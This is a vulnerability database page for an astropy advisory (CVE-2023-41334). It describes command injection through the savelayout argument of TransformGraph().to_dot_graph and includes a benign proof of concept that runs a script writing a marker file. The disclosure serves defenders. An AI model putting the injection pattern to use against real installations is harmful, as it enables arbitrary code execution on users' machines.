ghsa-h2x6-5jx5-46hf
Vulnerability from github
Published
2024-03-18 20:26
Modified
2024-03-18 21:46
Severity ?
8.4 (High) - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary
RCE in TranformGraph().to_dot_graph function
Details

Summary

RCE due to improper input validation in TranformGraph().to_dot_graph function

Details

Due to improper input validation a malicious user can provide a command or a script file as a value to savelayout argument, which will be placed as the first value in a list of arguments passed to subprocess.Popen. https://github.com/astropy/astropy/blob/9b97d98802ee4f5350a62b681c35d8687ee81d91/astropy/coordinates/transformations.py#L539 Although an error will be raised, the command or script will be executed successfully.

PoC

```shell $ cat /tmp/script

!/bin/bash

echo astrorce > /tmp/poc.txt shell $ python3 Python 3.9.2 (default, Feb 28 2021, 17:03:44) [GCC 10.2.1 20210110] on linux Type "help", "copyright", "credits" or "license" for more information.

from astropy.coordinates.transformations import TransformGraph tg = TransformGraph() tg.to_dot_graph(savefn="/tmp/1.txt", savelayout="/tmp/script") Traceback (most recent call last): File "", line 1, in File "/home/u32i/.local/lib/python3.9/site-packages/astropy/coordinates/transformations.py", line 584, in to_dot_graph stdout, stderr = proc.communicate(dotgraph) File "/usr/lib/python3.9/subprocess.py", line 1134, in communicate stdout, stderr = self._communicate(input, endtime, timeout) File "/usr/lib/python3.9/subprocess.py", line 1961, in _communicate input_view = memoryview(self._input) TypeError: memoryview: a bytes-like object is required, not 'str'

shell $ cat /tmp/poc.txt astrorce ```

Impact

code execution on the user's machine

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "astropy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.3.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-41334"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-74",
      "CWE-77"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-18T20:26:33Z",
    "nvd_published_at": "2024-03-18T19:15:05Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nRCE due to improper input validation in TranformGraph().to_dot_graph function\n\n### Details\n\nDue to improper input validation a malicious user can provide a command or a script file as a value to `savelayout` argument, which will be placed as the first value in a list of arguments passed to `subprocess.Popen`. \nhttps://github.com/astropy/astropy/blob/9b97d98802ee4f5350a62b681c35d8687ee81d91/astropy/coordinates/transformations.py#L539\nAlthough an error will be raised, the command or script will be executed successfully.\n\n### PoC\n\n```shell\n$ cat /tmp/script\n#!/bin/bash\necho astrorce \u003e /tmp/poc.txt\n```\n```shell\n$ python3\nPython 3.9.2 (default, Feb 28 2021, 17:03:44) \n[GCC 10.2.1 20210110] on linux\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n\u003e\u003e\u003e from astropy.coordinates.transformations import TransformGraph\n\u003e\u003e\u003e tg = TransformGraph()\n\u003e\u003e\u003e tg.to_dot_graph(savefn=\"/tmp/1.txt\", savelayout=\"/tmp/script\")\nTraceback (most recent call last):\n  File \"\u003cstdin\u003e\", line 1, in \u003cmodule\u003e\n  File \"/home/u32i/.local/lib/python3.9/site-packages/astropy/coordinates/transformations.py\", line 584, in to_dot_graph\n    stdout, stderr = proc.communicate(dotgraph)\n  File \"/usr/lib/python3.9/subprocess.py\", line 1134, in communicate\n    stdout, stderr = self._communicate(input, endtime, timeout)\n  File \"/usr/lib/python3.9/subprocess.py\", line 1961, in _communicate\n    input_view = memoryview(self._input)\nTypeError: memoryview: a bytes-like object is required, not \u0027str\u0027\n\u003e\u003e\u003e \n```\n```shell\n$ cat /tmp/poc.txt\nastrorce\n```\n\n### Impact\ncode execution on the user\u0027s machine\n",
  "id": "GHSA-h2x6-5jx5-46hf",
  "modified": "2024-03-18T21:46:18Z",
  "published": "2024-03-18T20:26:33Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/astropy/astropy/security/advisories/GHSA-h2x6-5jx5-46hf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41334"
    },
    {
      "type": "WEB",
      "url": "https://github.com/astropy/astropy/commit/22057d37b1313f5f5a9b5783df0a091d978dccb5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/astropy/astropy"
    },
    {
      "type": "WEB",
      "url": "https://github.com/astropy/astropy/blob/9b97d98802ee4f5350a62b681c35d8687ee81d91/astropy/coordinates/transformations.py#L539"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "RCE in TranformGraph().to_dot_graph function"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.